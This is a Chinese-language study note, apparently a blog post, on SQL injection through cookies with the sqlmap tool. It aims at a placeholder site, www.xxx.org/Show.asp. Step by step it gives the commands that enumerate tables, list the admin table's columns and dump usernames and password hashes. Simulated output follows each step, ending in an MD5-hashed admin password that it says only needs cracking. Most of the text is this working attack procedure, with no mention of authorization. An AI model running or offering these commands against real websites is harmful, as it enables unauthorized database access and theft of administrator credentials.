3.羽翼sqlmap学习笔记之Cookie注入

Cookie注入:

1.假设这个网址"http://www.xxx.org/Show.asp?id=9"存在注入点.
2.sqlmap命令提示符下输入下列内容进行跑表。

  sqlmap -u "http://www.xxx.org/Show.asp" --cookie "id=9" --table --level 2

   假设返回内容如下,说明是access数据库。

   -------------------------

   

   [INFO] resuming back-end DBMS 'microsoft access'



   -------------------------  

   设置线程数:10 
   假设返回结果:

-------------------------------------------

[ 4 tables]



+----------------------+



       admin

       mark

       province

       vote



+----------------------+

   找到四个表分别为:admin mark province vote

3.猜表的字段名:

  sqlmap -u "http://www.xxx.org/Show.asp" --cookie "id=9" --columns -T admin --level 2

     假设找到admin表的字段如下:                   
                            id username password 

---------------------------------



  [INFO] retrieved:       id

  [INFO] retrieved:       username

  [INFO] retrieved:       password



----------------------------------  

4.猜测字段的内容:

    sqlmap -u "http://www.xxx.org/Show.asp" --cookie "id=9" --dump -T admin -C "username,password" --level 2    

  获取结果:

  [INFO] retrieved:       1

  [INFO] retrieved:       admin

  [INFO] retrieved:       21232f297a57a5a743894a0e4a801fc3  (32位MD5加密密文)


  账号:admin 密码:将密文解密即可。

你可能感兴趣的:(cookie)